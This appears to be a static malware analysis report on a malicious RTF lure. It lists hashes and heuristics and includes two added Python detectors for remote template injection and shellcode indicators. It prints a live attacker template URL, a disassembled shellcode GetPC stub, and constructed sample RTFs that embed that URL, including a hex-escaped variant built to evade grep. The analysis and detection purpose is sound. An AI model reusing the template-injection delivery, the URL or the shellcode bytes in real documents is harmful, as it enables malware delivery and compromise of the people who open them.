Malicious RTF — malware analysis report

Static analysis result for SHA-256 766dc9c53d06ff93…

Verdict: MALICIOUS
File type: RTF
Size: 238.3 KB
Created: 2005-03-09 11:09:00
First seen: 2012-06-14
MD5: d031bc932d20ffb98c7c70dceca410b4
SHA-1: e133a3ef974bcc2d92d8111df38b267d3a51c3da
SHA-256: 766dc9c53d06ff9352be3f5df7a6a1300cde01c893c1d078b92c63ecdbe53968
Risk score: 202

Malware Insights

MITRE ATT&CK
T1204.002 Malicious File; T1566.001 Spearphishing Attachment

The RTF file triggers a high-severity heuristic for remote template injection: its \*\template destination points at http://zz815.topcities.com//model.dot, which Word fetches and loads when the document is opened. This is a common way to download and execute a second-stage payload (macros, an exploit document or a scriptlet) without the lure itself carrying anything obviously malicious. The file also contains the strings LoadLibrary, GetProcAddress, VirtualAlloc and VirtualProtect together with an x86 GetPC stub (CALL $+5; POP EBX), the usual signature of embedded shellcode that resolves its imports at run time and allocates writable, executable memory to stage code.
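A worked example, added here and not part of the report or of the scanner that produced it: a small Python parser that finds every {\*\template ...} destination in an RTF file, decodes it (handling \'hh hex escapes, \uN escapes and line breaks, all of which are legal RTF and routinely used to break naive greps) and classifies the target as local, remote URL or UNC path. The two sample documents are constructed for the example; only the template URL is taken from this report, and the verdict labels are the example's own, not the scanner's.

```python
# Added example (not from the original report): locate the {\*\template ...}
# destination in an RTF file and classify its target as local, remote URL or
# UNC, the check behind a RTF_REMOTE_TEMPLATE-style heuristic. The two sample
# documents are constructed here; only the template URL is taken from the report.
import re
import sys
from urllib.parse import urlsplit

# Constructed minimal RTF with the template target named in the report.
SAMPLE_RTF = (
    r"{\rtf1\ansi\deff0{\fonttbl{\f0 Calibri;}}" "\r\n"
    r"{\*\template http://zz815.topcities.com//model.dot}"
    r"{\info{\title decoy}}\pard Decoy body text.\par}"
).encode("ascii")

# Constructed variant: same target, but split by \'hh hex escapes and a line
# break (both legal RTF), so a plain grep for the URL misses it.
SAMPLE_RTF_OBFUSCATED = (
    b"{\\rtf1\\ansi{\\*\\template \\'68\\'74\\'74p://zz815.topcities.com\r\n"
    b"//model.dot}\\pard Decoy.\\par}"
)

# One RTF token starting at a backslash: \'hh hex escape, control word with an
# optional numeric parameter and trailing delimiter space, or control symbol.
_TOKEN = re.compile(rb"\\'([0-9A-Fa-f]{2})|\\([A-Za-z]+)(-?[0-9]+)? ?|\\(.)", re.DOTALL)
_TEMPLATE = re.compile(rb"\\\*\\template\b")


def _decode_destination(data: bytes, pos: int) -> str:
    """Decode the text of the current group from pos up to its closing brace.
    Text inside nested sub-groups is ignored; CR/LF are not RTF text."""
    out, depth, skip = [], 0, 0
    while pos < len(data):
        c = data[pos]
        if c == 0x7B:                       # '{' opens a nested group
            depth += 1
            pos += 1
            continue
        if c == 0x7D:                       # '}' closes a group
            if depth == 0:
                break
            depth -= 1
            pos += 1
            continue
        if c == 0x5C:                       # '\' starts a token
            m = _TOKEN.match(data, pos)
            pos = m.end() if m else pos + 1
            if not m or depth:
                continue
            hexbyte, word, param, sym = m.groups()
            if hexbyte is not None:
                if skip:
                    skip -= 1
                else:
                    out.append(bytes.fromhex(hexbyte.decode()).decode("cp1252", "replace"))
            elif word == b"u" and param is not None:
                out.append(chr(int(param) & 0xFFFF))
                skip = 1                    # \uN is followed by one fallback char (\uc1)
            elif sym in (b"\\", b"{", b"}"):
                out.append(sym.decode())
            elif sym == b"~":
                out.append(" ")
            continue
        pos += 1
        if depth or c in (0x0D, 0x0A):
            continue
        if skip:
            skip -= 1
        else:
            out.append(chr(c))
    return "".join(out)


def classify_template(target: str) -> str:
    """'local' for a file name or drive path, 'remote-url' for http/https/ftp,
    'remote-unc' for \\\\server\\share or file://server/... (NTLM leak channel)."""
    t = target.strip()
    if t.startswith("\\\\") or t.startswith("//"):
        return "remote-unc"
    u = urlsplit(t)
    scheme = u.scheme.lower()
    if scheme in ("http", "https", "ftp"):
        return "remote-url"
    if scheme == "file" and u.netloc:
        return "remote-unc"
    return "local"


def extract_templates(data: bytes) -> list:
    """Every \\*\\template destination in the file with its offset and verdict."""
    findings = []
    for m in _TEMPLATE.finditer(data):
        target = _decode_destination(data, m.end()).strip()
        findings.append({"offset": m.start(), "target": target,
                         "verdict": classify_template(target)})
    return findings


if __name__ == "__main__":
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_RTF
    for f in extract_templates(blob):
        print(f"0x{f['offset']:x}  {f['verdict']:<10}  {f['target']}")
```

Run it with a file path to check a real sample; with no argument it parses the constructed document. Any verdict other than local is worth a detonation or a look at what the remote host serves, and a UNC or file://server target should be treated as an NTLM credential leak even if the share no longer exists.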

Heuristics (7)

  • Remote template injection (\*\template → remote URL) [high; CVE related; RTF_REMOTE_TEMPLATE]
    The RTF's \*\template destination is a remote URL or UNC path. When Word opens the document it fetches and loads that template, which can carry macros or an exploit, deliver a scriptlet/HTA, or, over UNC, leak NTLM credentials to the attacker's server. Benign documents reference at most a local template, so a remote \*\template target is template-injection delivery (MITRE T1221). Evidence: remote \*\template target (Word fetches it on open), here http://zz815.topcities.com//model.dot.
  • x86 GetPC stub (CALL $+5; POP EBX) [high; SC_GETPC_CALL]
    A CALL to the very next instruction followed by a POP leaves the current address in a register, the standard way position-independent shellcode finds out where it was loaded. The same idiom also occurs in compiler-generated position-independent code and in packer and loader stubs, so on its own it is weaker evidence than the template finding; here it is corroborated by the API-name strings below and by the MOV/SUB/ADD sequence that immediately follows the stub, which rebases a pointer relative to where the code actually landed.
    Attempted x86 opcode disassembly at the hit offset:
    000377C9  e800000000        call 0x377ce
    000377CE  5b                pop ebx
    000377CF  b92f894000        mov ecx, 0x40892f
    000377D4  81e92c864000      sub ecx, 0x40862c
    000377DA  03d9              add ebx, ecx
    000377DC  50                push eax
    000377DD  53                push ebx
    000377DE  e83d020000        call 0x37a20
    000377E3  61                popal
    000377E4  03bddefdffff      add edi, dword ptr [ebp - 0x222]
    000377EA  8bdf              mov ebx, edi
    000377EC  833f00            cmp dword ptr [edi], 0
    000377EF  750a              jne 0x377fb
    000377F1  83c704            add edi, 4
    000377F4  b900000000        mov ecx, 0
    000377F9  eb16              jmp 0x37811
    000377FB  b901000000        mov ecx, 1
    00037800  033b              add edi, dword ptr [ebx]
    00037802  83c304            add ebx, 4
    00037805  833b00            cmp dword ptr [ebx], 0
    00037808  742d              je 0x37837
    0003780A  0113              add dword ptr [ebx], edx
    0003780C  8b33              mov esi, dword ptr [ebx]
    0003780E  037b04            add edi, dword ptr [ebx + 4]
    00037811  57                push edi
    00037812  51                push ecx
    00037813  52                push edx
    00037814  53                push ebx
    00037815  ffb536feffff      push dword ptr [ebp - 0x1ca]
    0003781B  ffb532feffff      push dword ptr [ebp - 0x1ce]
    00037821  56                push esi
    00037822  57                push edi
    00037823  ff95fafdffff      call dword ptr [ebp - 0x206]
  • Reference to LoadLibrary API [high; SC_STR_LOADLIBRARY]
  • Reference to GetProcAddress API [high; SC_STR_GETPROCADDRESS]
  • Reference to VirtualAlloc API [medium; SC_STR_VIRTUALALLOC]
  • Reference to VirtualProtect API [medium; SC_STR_VIRTUALPROTECT]
    These are string hits, not resolved imports: an RTF file has no import table, so the names are present because embedded code carries them to look the functions up at run time (LoadLibrary/GetProcAddress) and to obtain writable, executable memory for a staged payload (VirtualAlloc/VirtualProtect). Confirm by carving the hex-encoded object data and checking that the strings sit next to executable code rather than inside an embedded but otherwise benign binary.
  • Embedded URL [info; EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection; the per-URL label says which channel (macro, JS, link annotation, document body, ...) reached it. Every URL here was found in the RTF body text, and only http://zz815.topcities.com//model.dot is also the \*\template target. The trailing ".[7" and ").[7" fragments appear to be citation markers the extractor captured together with the link and are not part of the URL.
    • http://www.debates.org/pages/trans2004a.html.[7 (in RTF body)
    • http://www.cuhk.edu.hk/ics/21c/supplem/essay/040313a.htm (in RTF body)
    • http://www.debates.org/pages/trans2004a.html (in RTF body)
    • http://eserver.org/marx/1848-communist.manifesto/cm4.txt (in RTF body)
    • http://english.epochtimes.com/news/4-7-14/22421.html).[7 (in RTF body)
    • http://zz815.topcities.com//model.dot (in RTF body; also the remote \*\template target)
    • http://english.epochtimes.com/news/4-7-14/22421.html (in RTF body)
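A second added example (not the report's own code): the byte-level checks behind the SC_GETPC_CALL and SC_STR_* heuristics above, in Python, run over the raw file and over every long hex run it contains, since \objdata and \pict payloads are stored as hex text and the indicators usually live in the decoded bytes rather than in the RTF source. The payload and the RTF wrapper are constructed for the example; the 19-byte prologue is copied from the disassembly above. The FLDZ/FNSTENV pattern is a second common GetPC idiom added for completeness and is not something this report flags.

```python
# Added example (not from the original report): the byte-level checks behind
# the SC_GETPC_CALL and SC_STR_* heuristics, run over the raw file and over
# every long hex run it carries (\objdata / \pict payloads are stored as hex
# text). The payload and RTF wrapper below are constructed; the 19-byte
# prologue is copied from the report's disassembly.
import re
import sys

API_NAMES = (b"LoadLibrary", b"GetProcAddress", b"VirtualAlloc", b"VirtualProtect")

# Two classic x86 GetPC idioms: CALL $+5 followed by POP r32 (what the report
# flags), and FLDZ; FNSTENV [ESP-0xC], which leaks the saved FPU instruction
# pointer (added here, not flagged in the report).
GETPC_PATTERNS = {
    "CALL $+5 / POP r32": re.compile(rb"\xe8\x00\x00\x00\x00[\x58-\x5f]"),
    "FLDZ / FNSTENV [ESP-0xC]": re.compile(rb"\xd9\xee\xd9\x74\x24\xf4"),
}

# A run of at least 32 hex-encoded bytes, tolerating the line breaks RTF
# writers insert every 64 or so columns.
_HEX_RUN = re.compile(rb"(?:[0-9A-Fa-f]{2}\s*){32,}")


def decode_hex_runs(rtf: bytes) -> list:
    """(offset, payload) for every long hex run in the RTF text."""
    runs = []
    for m in _HEX_RUN.finditer(rtf):
        digits = re.sub(rb"\s+", b"", m.group())
        runs.append((m.start(), bytes.fromhex(digits.decode("ascii"))))
    return runs


def scan_shellcode_indicators(buf: bytes) -> list:
    """GetPC stubs and API-name strings (ASCII and UTF-16LE) with offsets."""
    hits = []
    for name, pat in GETPC_PATTERNS.items():
        for m in pat.finditer(buf):
            hits.append({"kind": "getpc", "detail": name, "offset": m.start()})
    for api in API_NAMES:
        for enc, needle in (("ascii", api), ("utf16le", api.decode().encode("utf-16-le"))):
            for m in re.finditer(re.escape(needle), buf):
                hits.append({"kind": "api-string", "detail": f"{api.decode()} ({enc})",
                             "offset": m.start()})
    return sorted(hits, key=lambda h: h["offset"])


def scan_rtf(rtf: bytes) -> list:
    """Raw-file hits plus hits inside each decoded hex run, tagged with the
    run's offset so the analyst knows where to carve the payload."""
    findings = [dict(h, where="raw") for h in scan_shellcode_indicators(rtf)]
    for off, payload in decode_hex_runs(rtf):
        for h in scan_shellcode_indicators(payload):
            findings.append(dict(h, where=f"hex run @0x{off:x}"))
    return findings


# Constructed payload: prologue bytes from the report (CALL $+5; POP EBX;
# MOV ECX; SUB ECX; ADD EBX,ECX), padding, then API names laid out the way a
# shellcode string table would carry them (one of them as UTF-16LE).
SAMPLE_PAYLOAD = (
    bytes.fromhex("e8000000005bb92f89400081e92c86400003d9")
    + b"\x90" * 8
    + b"LoadLibraryA\x00GetProcAddress\x00"
    + "VirtualAlloc".encode("utf-16-le") + b"\x00\x00"
)


def wrap_as_objdata(payload: bytes) -> bytes:
    """Constructed RTF wrapper: an OLE object whose \\*\\objdata is the hex of payload."""
    hexed = payload.hex().encode("ascii")
    lines = [hexed[i:i + 64] for i in range(0, len(hexed), 64)]
    return (b"{\\rtf1\\ansi{\\object\\objemb{\\*\\objdata\r\n"
            + b"\r\n".join(lines) + b"}}\\par}")


SAMPLE_OLE_RTF = wrap_as_objdata(SAMPLE_PAYLOAD)

if __name__ == "__main__":
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_OLE_RTF
    for h in scan_rtf(blob):
        print(f"{h['kind']:<11} 0x{h['offset']:06x}  {h['detail']}  [{h['where']}]")
```

With no argument the script scans the constructed document and reports the GetPC stub and three API-name strings, all located inside the single hex run; with a file path it scans a real sample. A hit tagged with a hex-run offset gives the place in the RTF to carve the embedded object, which is the next step before trusting a string hit as evidence of shellcode.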